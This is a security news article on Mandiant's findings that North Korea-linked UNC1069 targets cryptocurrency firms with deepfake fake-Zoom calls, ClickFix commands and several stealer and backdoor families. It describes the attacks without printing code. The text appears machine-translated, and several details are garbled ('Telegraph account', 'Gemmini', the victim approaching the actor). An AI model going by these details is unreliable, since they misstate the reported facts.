UNC1069 Linked to North Korea Uses AI Lures to Attack Cryptocurrency Organizations

This actor with connections to North Korea known as UNC1069 is considered to target the cryptocurrency sector to steal sensitive data from Windows and macOS systems with the aim of facilitating the theft of funds.

“The intervention relied on a social engineering scheme involving a compromised Telegraph account, a fake Zoom meeting, the ClickFix infection vector, and reporting using an AI-generated video to trick the victim,” said Google Mandiant researchers Ross Inman and Adrian Hernandez.

UNC1069, which has been tested since at least April 2018, has a history of running social engineering campaigns to make money using fake meeting invitations and pretending to be investors from reputable companies on Telegram. It is also tracked by the wider cybersecurity community under the monikers CryptoCore and MASAN.

In a report published last November, the Google Threat Intelligence Group (GTIG) demonstrated the threat actor’s use of artificial intelligence (AI) generation tools such as Gemini to produce lures and other messages related to cryptocurrency as part of efforts to support its social engineering campaigns.

The group has also been seen trying to abuse Gemmini to generate cryptocurrency stealing code, as well as promoting fake deep images and videos impersonating people in the cryptocurrency industry in their campaigns to distribute a backdoor called BIGMACHO to victims by passing it off as a Zoom software development kit (SDK).

“Since at least 2023, this group has moved away from phishing and traditional financial (TradFi) techniques targeting the Web3 industry, such as centralized exchanges (CEX), software developers in financial institutions, high-tech companies, and individuals in business finance,” Google said.

In a recent entry written by the tech giant’s threat intelligence division, UNC1069 is said to have spawned seven different malware families, including several new malware families, such as SILENCELIFT, DEEPBREATH, and CHROMEPUSH.

It all starts when the victim approaches a threatening actor via Telegram by pretending to be a venture capitalist and, in a few cases, even using compromised accounts of legitimate entrepreneurs and startup founders. Once the contacts are confirmed, the threat actor uses Calend to schedule a 30-minute meeting with them.

The meeting link is designed to redirect the victim to a fake website impersonating Zoom (“zoom.uswe05[.]us”). In some cases, meeting links are shared directly through messages on Telegram, often using Telegram’s link feature to hide phishing URLs.

Regardless of the method used, as soon as the victim clicks on the link, they are presented with a fake video call interface that displays Zoom, urging them to enable their camera and enter their name. Once the target has joined the meeting, a screen similar to a real Zoom meeting is displayed.

However, it is suspected that the videos are deepfakes or real recordings secretly filmed of other victims who have been victims of the same scheme. It is worth noting that Kaspersky is tracking a similar campaign under the name GhostCall, which was written in detail in October 2025.

“Their webcam images were unwittingly recorded, then uploaded to attacker-controlled infrastructure, and used to trick other victims into believing they were participating in a real call,” a Russian security vendor said at the time. “When the video playback ended, the page switched to showing that user’s profile picture, maintaining the illusion of a live call.”

The attack proceeds to the next stage where the victim is shown a fake error message about a supposed sound problem, after which they are instructed to download and run a ClickFix-style troubleshooting command to fix the problem. In the case of macOS, the commands lead to the delivery of AppleScript which, in turn, downloads the malicious Mach-O binary to the system.

Called WAVESHAPER, the C++ malicious utility is designed to gather system information and distribute a Go-based loader with HYPERCALL code, which is then used to provide additional payloads –

• A traceable component of a Golang backdoor known as HIDDENCALL, which provides manual keyboard access to a compromised system and releases a Swift-based data mine called DEEPBREATH.
• A second C++ loader called SUGARLOADER, used to load CHROMEPUSH.
• A small C/C++ backdoor called SILENCELIFT, which sends system information to the command and control server (C2).

DEEPBREATH is equipped to exploit MacOS’s Transparency, Consent, and Control (TCC) database to gain access to the file system, allowing it to steal iCloud Keychain information, and data from Google Chrome, Brave, and Microsoft Edge, Telegram, and the Apple Notes app.

Like DEEPBREATH, CHROMEPUSH also works as a data stealer, only written in C++ and used as a browser extension on Google Chrome and Brave browsers by masquerading as an offline Google Docs editing tool. It also comes with the ability to record keystrokes, view username and password, and remove browser cookies.

“The volume of tools deployed on a single host indicates a very serious effort to harvest credentials, browser data, and session tokens to facilitate financial theft,” Mandiant said. “While UNC1069 tends to target cryptocurrency startups, software developers, and large enterprise companies, the deployment of several new malware families alongside the popular downloader SUGARLOADER marks a significant increase in its power.”